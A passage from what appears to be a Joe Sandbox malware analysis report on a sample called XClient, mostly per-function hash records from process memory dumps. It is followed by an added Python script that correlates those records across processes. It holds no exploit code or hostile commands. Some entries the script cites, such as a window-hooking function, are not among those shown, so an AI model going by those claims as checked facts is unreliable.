                      • Instruction Fuzzy Hash: 8A62C821B29A594FE79CFB7C847567977D2FF98304F4401B9E05DC32DAED28A8428781
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2daba5ffc3eba50ab693d800ea13eff49e9ab86cb921ca1917076337b3b1098f
                      • Instruction ID: e54ff6fcc93d05525d08a726fabc67fe4e5944b4b43c1a8379aaff7ad3f1b914
                      • Opcode Fuzzy Hash: 2daba5ffc3eba50ab693d800ea13eff49e9ab86cb921ca1917076337b3b1098f
                      • Instruction Fuzzy Hash: 60412821B085598BD74EBB68ACB58E87B72EF48318B8441F2D45D832CFFD3C25428792
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 93cc70c2c2b1b180ca2155ae6ad4a62022a99ba0b958b8f7e90b363a01dd8c8f
                      • Instruction ID: 93b0ea9e0567ceca73c2a3081dc5affbbea785c0f2324f9c85a39dcb7de89ad7
                      • Opcode Fuzzy Hash: 93cc70c2c2b1b180ca2155ae6ad4a62022a99ba0b958b8f7e90b363a01dd8c8f
                      • Instruction Fuzzy Hash: 4A510310B1E6C90FD796AB7848756796FD1EF8A219B0900FBE089CB1EBDD185806C342
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 390bcffb736dfcb70cd0eebd86ca16e1bebbef19b6c6bd5dfe5646f49424a6ae
                      • Instruction ID: 3e9baa77678e91136398e8cc784a8488d815b801868bef31afaa7889e3540719
                      • Opcode Fuzzy Hash: 390bcffb736dfcb70cd0eebd86ca16e1bebbef19b6c6bd5dfe5646f49424a6ae
                      • Instruction Fuzzy Hash: 8D319820B19A4D8FD78DF72894B58A9BF72EF883047C045A5D819C33DFED3869058762
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db067edef9015a5fc29d7870068136a3bba954b97c307c80b0ff9f0aae178bd0
                      • Instruction ID: edd8a2fa582c5176062a9003ffaaa99b872987b1322f4b4f034691d8a3d38c5d
                      • Opcode Fuzzy Hash: db067edef9015a5fc29d7870068136a3bba954b97c307c80b0ff9f0aae178bd0
                      • Instruction Fuzzy Hash: AD31FB21B1894D0FD798FB2C587A679A6C1EF9C315F0501BEE00EC72EBDE689C018741
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f979c5aa0f76b53f6c3ee3b58a1743f739252130b4128edceca3c2a1db7db4e
                      • Instruction ID: 61f8ee649642f97c9d48c015b65add8bc1f5b68a6ca337fef753fd3b7d3f0078
                      • Opcode Fuzzy Hash: 1f979c5aa0f76b53f6c3ee3b58a1743f739252130b4128edceca3c2a1db7db4e
                      • Instruction Fuzzy Hash: 4441B430A18A1D8FDB49EB78C861AEDB7B2FF99300F9005B5D019D32DADE386841C751
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction ID: 7803e422d1136a6b6b5d3c874e7e2f1abf1f0e2d43eb12486e7901e2174a0cad
                      • Opcode Fuzzy Hash: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction Fuzzy Hash: 74215A21F149194BEB58BBBC586A7FC72D2FF9C715F100176E01DC32DADD1868424791
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ed32f0ee0d045c5981a8e7f762cc3293df1a6440b127dc65d3b6951551b72e59
                      • Instruction ID: 5c8b96ac16d2ad7f010e9d856dcad4e153271735f96a20f35f43c97bf5bfda51
                      • Opcode Fuzzy Hash: ed32f0ee0d045c5981a8e7f762cc3293df1a6440b127dc65d3b6951551b72e59
                      • Instruction Fuzzy Hash: BA016D12B1EAA94FF351737868215727FF0CB9A260B0905B7F888CA0A7E8085A4143D2
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2150bcad261736f9877ed4f9918bf52681024abcd03b1a6b91c75c135606c095
                      • Instruction ID: 426aebd77ad2b3f55cad0f7f19d326d5e6780001668c67992bb956d25ae8b338
                      • Opcode Fuzzy Hash: 2150bcad261736f9877ed4f9918bf52681024abcd03b1a6b91c75c135606c095
                      • Instruction Fuzzy Hash: 1562F861B29A494FE768FB7C887567DB6D2FF98300F4505BDE05EC32D6DE28A8428341
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b66672ab6aff8db00457340c4b6bb7b3d45c7e049cd0bbbd5b3de90e357bebf4
                      • Instruction ID: d7d7438648adbc74ab14e1adf56b051a6e9155529f897926bbc7988a0e94dd97
                      • Opcode Fuzzy Hash: b66672ab6aff8db00457340c4b6bb7b3d45c7e049cd0bbbd5b3de90e357bebf4
                      • Instruction Fuzzy Hash: 74514861B0855A8BD30DBB68BC758EC7F61EF4431479941F6D05DC32CBED3824428B82
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c8507986f123b66c3b2081a7af92c66bb17e05ebc8673a674a25f8c0da04d1ed
                      • Instruction ID: 686d92cb759ba4e575bcc2117e76b31ac9f1ea2283d9dc513c5e826a395c8334
                      • Opcode Fuzzy Hash: c8507986f123b66c3b2081a7af92c66bb17e05ebc8673a674a25f8c0da04d1ed
                      • Instruction Fuzzy Hash: FA31D420748A494FD75CEB28A8B08ADBF75EF88200BD544A9D01AC33CADE3468458B52
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e2e4790ada01148677f8fe9a11dc53057a7472d94e0bc9c69989e66e7bde5e76
                      • Instruction ID: 44506cd5678a768a9f31ff26d4c7fd4fe75fa480439bd8d734fd3ba7b79dc347
                      • Opcode Fuzzy Hash: e2e4790ada01148677f8fe9a11dc53057a7472d94e0bc9c69989e66e7bde5e76
                      • Instruction Fuzzy Hash: A051F110B1E6C90FD796AB784875675AFD1DF8B219B0900FBE099C71EBDD185806C352
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b957b077887ba727d7db1f8d1f3981daf4c663712164d1fd5374f25c445f5084
                      • Instruction ID: 9d95a7a74ce7a3294259f842e10476a7cebe42f602b35401839ed8281955153d
                      • Opcode Fuzzy Hash: b957b077887ba727d7db1f8d1f3981daf4c663712164d1fd5374f25c445f5084
                      • Instruction Fuzzy Hash: FB31D921B189490FDB98FB2C587A679A7C1EF9D315F0505BEE01EC32EBDE689C418341
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1bb130fe91c820b28042e938445aaeed8dbee0941b89d3c2c467caec3e1d359e
                      • Instruction ID: 150d7013b7f407781f293610b667b41d2a4cd25810eda2b988d8fa95e02de357
                      • Opcode Fuzzy Hash: 1bb130fe91c820b28042e938445aaeed8dbee0941b89d3c2c467caec3e1d359e
                      • Instruction Fuzzy Hash: E341A330B18A0D8FDB48EBA89861AFD7BB1FF98300F9545B9D019D32D6DE38A841C751
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d68f39ef713b8b6c935d6a740e7b18b37b3ba00f12b98bb8d7cc9dfe7d5bd1b9
                      • Instruction ID: 5965552b2b8381a4d713dcbeac19efb028c121aecb11e7b0a161cbb598113909
                      • Opcode Fuzzy Hash: d68f39ef713b8b6c935d6a740e7b18b37b3ba00f12b98bb8d7cc9dfe7d5bd1b9
                      • Instruction Fuzzy Hash: 87212761F149094BFB88BBBC586A7FC72D2EF98715F10417AE51DC32DADD28A8428351
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_7ffd9b8a0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ebbb7f509d98e702b886392a977c44609bb65a540c81caf30944f369a0b87908
                      • Instruction ID: c8f2625205274d8f2db1a326cbd929affc071e520b9701cb736ab23b89961f69
                      • Opcode Fuzzy Hash: ebbb7f509d98e702b886392a977c44609bb65a540c81caf30944f369a0b87908
                      • Instruction Fuzzy Hash: AF018912B0E6490EF354772828615717BE0CB97220B0D05BBE888C60E7E8085A41C3A2
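The entries above are machine-generated per-function records, and the useful work is correlating them across the analysed processes. The script below is an added example; it is not part of the Joe Sandbox report and not Joe Sandbox tooling. It parses entries in the layout printed above, lists every function that carries an API ID (here the SetWindowsHookExW caller tagged HookWindows in process 0), reports Opcode IDs that recur in more than one process (50b5c4e9... appears in both process 3 and process 9), and flags entries from different processes whose Instruction Fuzzy Hashes differ in only a few characters (1d01f3f5... in process 3 and 93cc70c2... in process 9 differ in two). The sample input is constructed from six entries on this page, trimmed to the bullet lines the parser reads. Two things are this example's assumptions rather than documented Joe Sandbox behaviour: the first dotted component of the Source File name is read as the hexadecimal process number (0000000A is process 10, which matches the decimal in hcaresult_10_2_...), and the fuzzy-hash comparison is a plain character distance, not Joe Sandbox's own similarity metric.

```python
"""Correlate Joe Sandbox 'Memory Dump Source' function entries across processes.
Added example, not Joe Sandbox code; the entry layout is the one printed in the
report above.  SAMPLE is constructed from six entries on this page, trimmed to
the bullet lines the parser uses."""
import re
from collections import defaultdict
from itertools import combinations

SAMPLE = """
Memory Dump Source
• Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
• API ID: HookWindows
• Opcode ID: 2175d6044e1fabf81b224838e98d95c9f498410c5805a52f98df7858fff6b2de
• Instruction Fuzzy Hash: A341E730A0CE4D4FDB1CEB6C98566F9BBE1EF59321F00427EE059C3192DA75A81287C1
Memory Dump Source
• Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
• API ID:
• Opcode ID: 1d01f3f508d4b3f75c93edafafff6f7dcb28488229271226e2df27b1ab8d61b3
• Instruction Fuzzy Hash: 40510310B1E6C90FD756AB7848756796FD1EF8A219B0900FBE089CB1EBDD185806C342
Memory Dump Source
• Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
• Opcode ID: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
• Instruction Fuzzy Hash: 74215A21F149194BEB58BBBC586A7FC72D2FF9C715F100176E01DC32DADD1868424791
Memory Dump Source
• Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
• Opcode ID: 93cc70c2c2b1b180ca2155ae6ad4a62022a99ba0b958b8f7e90b363a01dd8c8f
• Instruction Fuzzy Hash: 4A510310B1E6C90FD796AB7848756796FD1EF8A219B0900FBE089CB1EBDD185806C342
Memory Dump Source
• Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
• Opcode ID: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
• Instruction Fuzzy Hash: 74215A21F149194BEB58BBBC586A7FC72D2FF9C715F100176E01DC32DADD1868424791
Memory Dump Source
• Source File: 0000000A.00000002.3558151493.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
• Opcode ID: ebbb7f509d98e702b886392a977c44609bb65a540c81caf30944f369a0b87908
• Instruction Fuzzy Hash: AF018912B0E6490EF354772828615717BE0CB97220B0D05BBE888C60E7E8085A41C3A2
"""

# One '• Key: value' bullet per line; the key stops at the first colon, so a
# Source File value keeps its embedded 'Offset: ..., based on PE: ...' text.
FIELD = re.compile(r"^[ \t]*•[ \t]*([^:\n]+?):[ \t]*(.*?)[ \t]*$", re.M)


def parse_entries(text):
    """Split report text at each 'Memory Dump Source' line into per-function dicts."""
    entries = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields = dict(FIELD.findall(chunk))
        src = fields.get("Source File", "")
        # Assumption: the first dotted component of the dump name is the process
        # number in hex (0000000A -> 10), matching the decimal in hcaresult_10_2_...
        proc = int(src.split(".", 1)[0], 16) if src else None
        entries.append({"proc": proc,
                        "opcode_id": fields.get("Opcode ID", ""),
                        "api_id": fields.get("API ID", ""),
                        "ifh": fields.get("Instruction Fuzzy Hash", "")})
    return entries


def shared_functions(entries):
    """Opcode IDs present in more than one process -> sorted process numbers.
    The same Opcode ID in several XClient dumps means the same function body
    is present in each of those processes."""
    seen = defaultdict(set)
    for e in entries:
        if e["opcode_id"]:
            seen[e["opcode_id"]].add(e["proc"])
    return {oid: sorted(p) for oid, p in seen.items() if len(p) > 1}


def api_functions(entries):
    """(process, opcode_id, api_id) for every entry carrying an API ID tag."""
    return [(e["proc"], e["opcode_id"], e["api_id"]) for e in entries if e["api_id"]]


def hamming(a, b):
    """Number of differing character positions, or None if lengths differ.
    A plain heuristic for comparing fuzzy-hash strings, not Joe Sandbox's metric."""
    if len(a) != len(b):
        return None
    return sum(x != y for x, y in zip(a, b))


def near_matches(entries, max_diff=4):
    """Pairs from different processes with different Opcode IDs whose Instruction
    Fuzzy Hashes differ in at most max_diff positions: likely the same function
    with small address or register differences between dumps."""
    out = []
    for a, b in combinations(entries, 2):
        if a["proc"] == b["proc"] or a["opcode_id"] == b["opcode_id"]:
            continue
        d = hamming(a["ifh"], b["ifh"])
        if d is not None and d <= max_diff:
            out.append((a["opcode_id"], b["opcode_id"], d))
    return out


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    print("API-tagged functions:", api_functions(ents))
    print("Opcode IDs shared across processes:", shared_functions(ents))
    print("Near-identical fuzzy hashes across processes:", near_matches(ents))
```

Paste the report's own "Memory Dump Source" blocks in place of SAMPLE to run it over the full listing; only the bullet lines are read, so the Control-flow Graph, APIs and Similarity headings between entries are ignored.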